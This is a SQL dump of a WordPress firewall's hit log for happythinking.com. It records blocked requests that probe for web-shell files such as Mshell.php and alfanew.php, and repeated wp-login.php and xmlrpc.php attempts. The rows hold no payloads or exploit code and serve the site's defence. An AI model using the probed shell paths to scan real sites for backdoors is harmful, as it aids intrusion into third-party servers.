(50616, 1711731972.739430, 1711731972.279100, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/css/colors/coffee/mari.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vY3NzL2NvbG9ycy9jb2ZmZWUvbWFyaS5waHA=","category":"brute-force","ssl":1}'),
(50814, 1712000512.114038, 1712000511.627700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/blog.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jsb2cucGhw","category":"brute-force","ssl":1}'),
(50617, 1711731970.922498, 1711731970.556700, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///marijuana.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vbWFyaWp1YW5hLnBocA==","category":"brute-force","ssl":1}'),
(50295, 1711080787.940583, 1711080787.602900, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/simple.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(52000, 1712689325.626142, 1712689325.076800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JlcGVhdGVyLnBocA==","category":"brute-force","ssl":1}'),
(51912, 1712636868.382036, 1712636868.045700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-2019.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLTIwMTkucGhw","category":"brute-force","ssl":1}'),
(51907, 1712636956.328906, 1712636955.984100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(51908, 1712636945.256091, 1712636944.926600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/log.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2xvZy5waHA=","category":"brute-force","ssl":1}'),
(51896, 1712625156.392133, 1712625153.945800, '\0\0\0\0\0\0\0\0\0\0ÿÿ#Ñ6', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/woocommerce/readme.txt', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; rb.gy/oupwis; a98ce8ee39) Chrome/84.0.4147.105 Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51895, 0.000000, 1712624926.289774, '\0\0\0\0\0\0\0\0\0\0ÿÿrtQä', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51894, 0.000000, 1712589210.712751, '\0\0\0\0\0\0\0\0\0\0ÿÿ)åè', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51893, 0.000000, 1712588673.628673, '\0\0\0\0\0\0\0\0\0\0ÿÿ"W“', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50913, 1712082555.677854, 1712082554.649400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/alfanew.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFuZXcucGhw","category":"brute-force","ssl":1}'),
(50963, 1712207618.188245, 1712207617.740000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(50490, 1711358610.748449, 1711358610.457400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-login.php?action=register', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}');
INSERT INTO `wpou_wfhits` VALUES
(50493, 1711377597.143372, 1711377596.713700, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/Mshell.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L01zaGVsbC5waHA=","category":"brute-force","ssl":1}'),
(50488, 1711358651.484792, 1711358651.137100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/updates.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZGF0ZXMucGhw","category":"brute-force","ssl":1}'),
(50494, 1711381267.116857, 1711381266.753000, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/radio.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JhZGlvLnBocA==","category":"brute-force","ssl":1}'),
(50489, 1711358624.979071, 1711358624.668900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/404.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"LzQwNC5waHA=","category":"brute-force","ssl":1}'),
(50491, 1711378056.493768, 1711378056.121200, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-admin/css/index.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2Nzcy9pbmRleC5waHA=","category":"brute-force","ssl":1}'),
(50497, 1711381260.993738, 1711381260.645600, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/cong.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmcucGhw","category":"brute-force","ssl":1}'),
(50492, 1711378054.542297, 1711378054.152800, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-includes/themes.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWluY2x1ZGVzL3RoZW1lcy5waHA=","category":"brute-force","ssl":1}'),
(50495, 1711381265.256016, 1711381264.940500, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/css/index.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy9pbmRleC5waHA=","category":"brute-force","ssl":1}'),
(50496, 1711381262.813775, 1711381262.479200, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/st.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3N0LnBocA==","category":"brute-force","ssl":1}'),
(50428, 1711358514.932791, 1711358514.596500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/bak.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jhay5waHA=","category":"brute-force","ssl":1}'),
(50429, 1711358489.856912, 1711358489.536100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/doc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2RvYy5waHA=","category":"brute-force","ssl":1}'),
(50445, 1711359195.667341, 1711359195.263000, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-admin/dropdown.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
(50335, 0.000000, 1711090253.357077, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50333, 0.000000, 1711088761.812466, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50334, 0.000000, 1711089506.171390, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50359, 1711120906.777665, 1711120906.484100, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼á(Œ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(50317, 1711080838.878106, 1711080838.545300, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/404.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"LzQwNC5waHA=","category":"brute-force","ssl":1}'),
(50336, 0.000000, 1711091002.194793, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50337, 0.000000, 1711091760.281329, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50338, 0.000000, 1711092512.222287, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50339, 0.000000, 1711093264.625007, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50340, 0.000000, 1711095494.540803, '\0\0\0\0\0\0\0\0\0\0ÿÿk®ºJ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
